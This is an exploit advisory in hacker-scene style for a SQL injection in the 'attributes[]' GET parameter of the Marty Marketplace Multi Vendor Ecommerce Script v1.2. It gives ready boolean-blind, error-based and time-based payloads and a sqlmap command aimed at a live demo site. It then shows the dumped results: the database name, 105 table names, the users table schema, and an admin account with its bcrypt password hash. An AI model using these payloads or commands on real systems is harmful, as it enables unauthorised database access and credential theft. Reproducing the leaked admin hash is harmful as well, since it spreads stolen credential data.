┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││                                     C r a C k E r                                    ┌┘
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                       [ Exploits ]                                   ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:  Author   : CraCkEr                        │ │                                         :
│  Website  : sangvish.com                   │ │                                         │
│  Vendor   : SangVish Technologies          │ │                                         │
│  Software : Marty Marketplace Multi Vendor │ │  Open Source Marketplace PHP script for │
│             Ecommerce Script v1.2          │ │  eCommerce marketplace platforms        │
│  Vuln Type: Remote SQL Injection           │ │  in the market                          │
│  Method   : GET                            │ │                                         │
│  Impact   : Database Access                │ │                                         │
│                                            │ │                                         │
│────────────────────────────────────────────┘ └─────────────────────────────────────────│
│                              B4nks-NET irc.b4nks.tk #unix                             ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:                                                                                        :
│  Release Notes:                                                                        │
│  ═════════════                                                                         │
│  Typically used for remotely exploitable vulnerabilities that can lead to              │
│  system compromise.                                                                    │
│                                                                                        │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                                                                      ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:
       Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
	   loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear
       
	   CryptoJob (Twitter) twitter.com/CryptozJob
	   
	   Special Greetz to The Lebanese National Basketball Team for the results of
	   the FIBA Asia Cup
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                     © CraCkEr 2022                                   ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

GET parameter 'attributes[]' is vulnerable
---
Parameter: attributes[] (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: attributes[]=(SELECT (CASE WHEN (6997=6997) THEN 6 ELSE (SELECT 7905 UNION SELECT 6396) END))

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: attributes[]=6 AND GTID_SUBSET(CONCAT(0x717a7a6271,(SELECT (ELT(8162=8162,1))),0x716b6a7071),8162)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: attributes[]=6 AND (SELECT 8488 FROM (SELECT(SLEEP(5)))dSkn)
---


Demo: https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6


[+] Starting the Attack

sqlmap.py -u "https://demowpthemes.com/buy2marty/products?attributes%5B%5D=6" --current-db --batch


[+] fetching current database

[INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[INFO] retrieved: 'garudan_buy2marty'
current database: 'garudan_buy2marty'


[+] fetching tables for database: 'garudan_buy2marty'

Database: garudan_buy2marty
[105 tables]

+----------------------------------------+
| activations                            |
| ads                                    |
| ads_translations                       |
| audit_histories                        |
| categories                             |
| categories_translations                |
| contact_replies                        |
| contacts                               |
| dashboard_widget_settings              |
| dashboard_widgets                      |
| ec_brands                              |
| ec_brands_translations                 |
| ec_cart                                |
| ec_currencies                          |
| ec_customer_addresses                  |
| ec_customer_password_resets            |
| ec_customers                           |
| ec_discount_customers                  |
| ec_discount_product_collections        |
| ec_discount_products                   |
| ec_discounts                           |
| ec_flash_sale_products                 |
| ec_flash_sales                         |
| ec_flash_sales_translations            |
| ec_grouped_products                    |
| ec_order_addresses                     |
| ec_order_histories                     |
| ec_order_product                       |
| ec_orders                              |
| ec_product_attribute_sets              |
| ec_product_attribute_sets_translations |
| ec_product_attributes                  |
| ec_product_attributes_translations     |
| ec_product_categories                  |
| ec_product_categories_translations     |
| ec_product_category_product            |
| ec_product_collection_products         |
| ec_product_collections                 |
| ec_product_collections_translations    |
| ec_product_cross_sale_relations        |
| ec_product_label_products              |
| ec_product_labels                      |
| ec_product_labels_translations         |
| ec_product_related_relations           |
| ec_product_tag_product                 |
| ec_product_tags                        |
| ec_product_tags_translations           |
| ec_product_up_sale_relations           |
| ec_product_variation_items             |
| ec_product_variations                  |
| ec_product_with_attribute              |
| ec_product_with_attribute_set          |
| ec_products                            |
| ec_products_translations               |
| ec_reviews                             |
| ec_shipment_histories                  |
| ec_shipments                           |
| ec_shipping                            |
| ec_shipping_rule_items                 |
| ec_shipping_rules                      |
| ec_store_locators                      |
| ec_taxes                               |
| ec_wish_lists                          |
| failed_jobs                            |
| faq_categories                         |
| faq_categories_translations            |
| faqs                                   |
| faqs_translations                      |
| jobs                                   |
| language_meta                          |
| languages                              |
| media_files                            |
| media_folders                          |
| media_settings                         |
| menu_locations                         |
| menu_nodes                             |
| menus                                  |
| meta_boxes                             |
| migrations                             |
| mp_customer_revenues                   |
| mp_customer_withdrawals                |
| mp_stores                              |
| mp_vendor_info                         |
| newsletters                            |
| pages                                  |
| pages_translations                     |
| password_resets                        |
| payments                               |
| post_categories                        |
| post_tags                              |
| posts                                  |
| posts_translations                     |
| revisions                              |
| role_users                             |
| roles                                  |
| settings                               |
| simple_slider_items                    |
| simple_sliders                         |
| slugs                                  |
| tags                                   |
| tags_translations                      |
| translations                           |
| user_meta                              |
| users                                  |
| widgets                                |
+----------------------------------------+


[+] fetching columns for table 'users' in database 'garudan_buy2marty'

Database: garudan_buy2marty
Table: users
[15 columns]

+-------------------+---------------------+
| Column            | Type                |
+-------------------+---------------------+
| avatar_id         | int(10) unsigned    |
| created_at        | timestamp           |
| email             | varchar(191)        |
| email_verified_at | timestamp           |
| first_name        | varchar(191)        |
| id                | bigint(20) unsigned |
| last_login        | timestamp           |
| last_name         | varchar(191)        |
| manage_supers     | tinyint(1)          |
| password          | varchar(191)        |
| permissions       | text                |
| remember_token    | varchar(100)        |
| super_user        | tinyint(1)          |
| updated_at        | timestamp           |
| username          | varchar(60)         |
+-------------------+---------------------+


[+] fetching entries of column(s) 'id,password,permissions,super_user,username' for table 'users' in database 'garudan_buy2marty'

Database: garudan_buy2marty
Table: users
[1 entry]

+----+----------+--------------------------------------------------------------+------------+-------------+
| id | username | password                                                     | super_user | permissions |
+----+----------+--------------------------------------------------------------+------------+-------------+
| 1  | admin    | $2y$10$XHYYo3gcYa5sUh62hgASseoSJfQae/w8KOWAW/G6qlHRri6XPRW/2 | 1          | NULL        |
+----+----------+--------------------------------------------------------------+------------+-------------+
                 Possible algorithms: bcrypt $2*$, Blowfish (Unix)


[-] Done